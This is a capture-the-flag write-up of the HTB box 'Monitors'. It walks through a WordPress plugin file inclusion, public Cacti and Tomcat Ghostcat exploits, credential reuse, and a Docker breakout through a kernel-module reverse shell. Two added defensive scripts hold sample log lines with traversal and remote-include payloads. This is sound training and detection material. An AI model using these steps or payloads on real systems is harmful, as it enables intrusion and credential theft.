🔎🦶Enumeration/Foothold

Monitors is a Hard box from HTB created by TheCyberGeek. This box features a WordPress plugin exploit via wp-with-spritz allowing LFI/RFI, and an internal docker container running Apache Tomcat. I begin each box by running a RustScan. This is bundled into my setup.sh script which I've mentioned in a few of my other posts. Running RustScan with NMAP filters shows a website available on Port 80. The website states 'Sorry, direct IP access is not allowed' but provides an admin contact detail.

admin@monitors.htb email address.

I edit my host file and add in monitors.htb.


Navigating over to the domain I see a WordPress website. Reviewing the page I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out of date WordPress.


While the scan is running I notice that wp-with-spritz has been detected and that its last update was in 2015.

wp-with-spritz coming up as 2015 being the last update.

A short search later shows me an entry from ExploitDB – 44544 which shows an LFI/RFI available for the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.

Next I used the LFI (Local File Inclusion) exploit to pull the WP-Config file. The WP-Config file stores the database credentials for a WordPress installation. I viewed it in source as it tends to look cleaner than the static view.
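From the defender's side, the same plugin weakness shows up clearly in the web server's access log. The following is an added example (not part of the original write-up) that scans constructed Apache combined-format log lines for traversal (LFI) or off-site URL (RFI) values in the plugin's `url` parameter; the plugin endpoint path `wp.spritz.content.filter.php` and the parameter name are assumptions based on the ExploitDB entry, and the log lines are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed plugin endpoint (from the ExploitDB 44544 description) and the hosts
# that a legitimate "url=" value on this site would point at.
PLUGIN_PATH = "/wp-content/plugins/wp-with-spritz/"
LOCAL_HOSTS = {"monitors.htb", "localhost"}

# Apache combined log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not captured from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [09/Oct/2021:10:01:11 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../wp-config.php HTTP/1.1" 200 3112 "-" "curl/7.68.0"
10.10.14.5 - - [09/Oct/2021:10:01:13 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http%3A%2F%2F203.0.113.9%2Fx.txt HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.14.5 - - [09/Oct/2021:10:01:15 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://monitors.htb/2020/01/hello/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [09/Oct/2021:10:01:20 +0000] "GET /?p=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""


def classify(target: str):
    """Return 'LFI', 'RFI' or None for one request target (path + query)."""
    parts = urlsplit(target)
    if not parts.path.startswith(PLUGIN_PATH):
        return None
    for value in parse_qs(parts.query).get("url", []):
        v = unquote(unquote(value))  # tolerate double URL-encoding
        # Any ".." path segment is a traversal attempt against local files.
        if ".." in v.replace("\\", "/").split("/"):
            return "LFI"
        u = urlsplit(v)
        if u.scheme in ("http", "https", "ftp") and u.hostname not in LOCAL_HOSTS:
            return "RFI"
    return None


def detect(log_text: str):
    """Yield (client ip, finding, HTTP status) for each suspicious log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (kind := classify(m["target"])):
            hits.append((m["ip"], kind, m["status"]))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

A 200 status on the LFI line is the signal that the include succeeded, which is the moment the wp-config credentials should be considered exposed.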

WP-Config file running in source.

I try the credentials to log in to the WordPress admin but they don't work. I check a few locations for the next point of escalation. I review the NMAP output and realise the machine is running Apache/2.4.29. I navigate to the 000-default.conf to see if the page we saw earlier can give us any additional information, or if any other hosts exist.

Running Apache/2.4.29

An additional VHOST is available.

I add the new host in my hosts file and navigate over to the new sub-domain. I try the credentials found earlier in the WP-Config file and log in. It took me a second as I needed to use admin for the username and not wpadmin.

 

I navigate around the console looking for a file upload or script option. Next I check the version which is located at the top right of the page.

Cacti 1.2.12

🔝Escalation

This leads me to ExploitDB – 49810, which I pull to my Attack VM and run. I fill in the required variables and submit the request, giving me a low privilege shell.

⚠ Attack Machine (Tab 1)

ExploitDB – 49810 running successfully.

⚠ Attack Machine (Tab 2)


After getting onto the machine and upgrading my shell I tried to use curl or wget to pull files to the box, but neither was installed. Using nc I pulled LinEnum to the box.

🎯Victim Machine


⚠ Attack Machine


Going through the endless string of results I notice cacti-backup.service. I also notice that the user marcus, who I was trying to escalate to, has a .backup directory.

.backup directory in Marcus' home directory.

cacti-backup.service running on the machine.

Reviewing the cacti-backup.service I can see that the .backup folder mentioned earlier has a shell script inside it. Viewing the script gives me his credentials. I su to his account, grab the flag and try SSH.

cacti-backup.service showing a backup script running in .backup

Password for Marcus in backup.sh

I log in with SSH and read the note.

This must be a clue to how I progress. I check the running services, looking for a docker installation. I notice Port 8443 listening on localhost, which wasn't visible on the original scan. I use SSH to forward the port to my local host.

Port 8443 open on the local host.

Apache Tomcat/9.0.31 running on the local host.

Viewing the page does not give me the exploit I was hoping for, but I do notice Apache Tomcat/9.0.31 running, which I know is frequently exploited. A short Google later shows me that a Metasploit module is available.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit


The first time I ran the exploit it errored and told me to set ForceExploit to override. Doing this allowed me to get a Meterpreter shell.

ForceExploit option used due to the local host pivot.

After running the exploit I could see I was root inside the docker container. I knew the next steps were to escape and escalate. I found this article on hacktricks: hacktricks – Docker Breakout.

Inside the previous output you can see that the SYS_MODULE capability is enabled. Going through the first link led me to a second article focused fully on CAP_SYS_MODULE: hacktricks – CAP_SYS_MODULE. Truthfully this part can be confusing, so just follow the article as best you can.
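The capability check itself is worth understanding: the kernel reports a process's capabilities as a hex bitmask in /proc/self/status, and a container that has bit 16 (CAP_SYS_MODULE) set can load kernel modules into the shared host kernel, which is exactly why the breakout works. The following added example (mine, not from the write-up or from hacktricks) decodes that mask, compares it with Docker's default capability set and flags capabilities that give a container a path to the host; the /proc/self/status excerpt is constructed sample data.

```python
import re

# Linux capability bit numbers, in order (include/uapi/linux/capability.h).
CAP_NAMES = [
    "CHOWN", "DAC_OVERRIDE", "DAC_READ_SEARCH", "FOWNER", "FSETID", "KILL",
    "SETGID", "SETUID", "SETPCAP", "LINUX_IMMUTABLE", "NET_BIND_SERVICE",
    "NET_BROADCAST", "NET_ADMIN", "NET_RAW", "IPC_LOCK", "IPC_OWNER",
    "SYS_MODULE", "SYS_RAWIO", "SYS_CHROOT", "SYS_PTRACE", "SYS_PACCT",
    "SYS_ADMIN", "SYS_BOOT", "SYS_NICE", "SYS_RESOURCE", "SYS_TIME",
    "SYS_TTY_CONFIG", "MKNOD", "LEASE", "AUDIT_WRITE", "AUDIT_CONTROL",
    "SETFCAP", "MAC_OVERRIDE", "MAC_ADMIN", "SYSLOG", "WAKE_ALARM",
    "BLOCK_SUSPEND", "AUDIT_READ", "PERFMON", "BPF", "CHECKPOINT_RESTORE",
]
# Capabilities that let a containerised process reach the host kernel or host files.
HOST_ESCAPE_CAPS = {"SYS_MODULE", "SYS_ADMIN", "SYS_PTRACE", "SYS_RAWIO",
                    "DAC_READ_SEARCH", "BPF"}
# Docker's default capability set as a CapEff mask (14 capabilities).
DOCKER_DEFAULT_MASK = "00000000a80425fb"


def decode_caps(hex_mask: str) -> set:
    """Turn a CapEff/CapBnd hex mask into the set of capability names."""
    mask = int(hex_mask, 16)
    return {name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1}


def extra_caps(hex_mask: str) -> set:
    """Capabilities granted beyond Docker's default set (i.e. via --cap-add or --privileged)."""
    return decode_caps(hex_mask) - decode_caps(DOCKER_DEFAULT_MASK)


def audit_status(status_text: str) -> dict:
    """Audit the CapEff line of a /proc/<pid>/status file."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line found")
    caps = decode_caps(m.group(1))
    return {"effective": caps,
            "beyond_default": extra_caps(m.group(1)),
            "host_escape": sorted(caps & HOST_ESCAPE_CAPS)}


# Constructed excerpt: Docker defaults plus bit 16 (CAP_SYS_MODULE) = 0xa80525fb.
SAMPLE_STATUS = "Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80525fb\n" \
                "CapEff:\t00000000a80525fb\nCapBnd:\t00000000a80525fb\n"

if __name__ == "__main__":
    try:
        text = open("/proc/self/status").read()  # real process when run on Linux
    except OSError:
        text = SAMPLE_STATUS
    print(audit_status(text))
```

`capsh --decode=00000000a80525fb` gives the same name list from the shell; the point of the script is the comparison against the default set, which is what turns "a list of caps" into "this container was started with more than it should have".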

🎯Victim Machine


⚠ Attack Machine

Use the copy button (on the website) to copy reverse-shell.c and the Makefile. Then edit line 8 of reverse-shell.c and put in your own IP/Port. Make sure when copying the Makefile that each recipe line is indented with a tab character and not spaces, or make will fail. When done, launch a web server and pull both files to the machine.

📜 Makefile


📜 reverse-shell.c


After we load reverse-shell.ko inside the docker container, the module runs in the shared host kernel, our reverse shell pops and we are root on the host.

Root on Monitors from HTB.

Rooted

Published On: October 9th, 2021 / Categories: HTB, Technology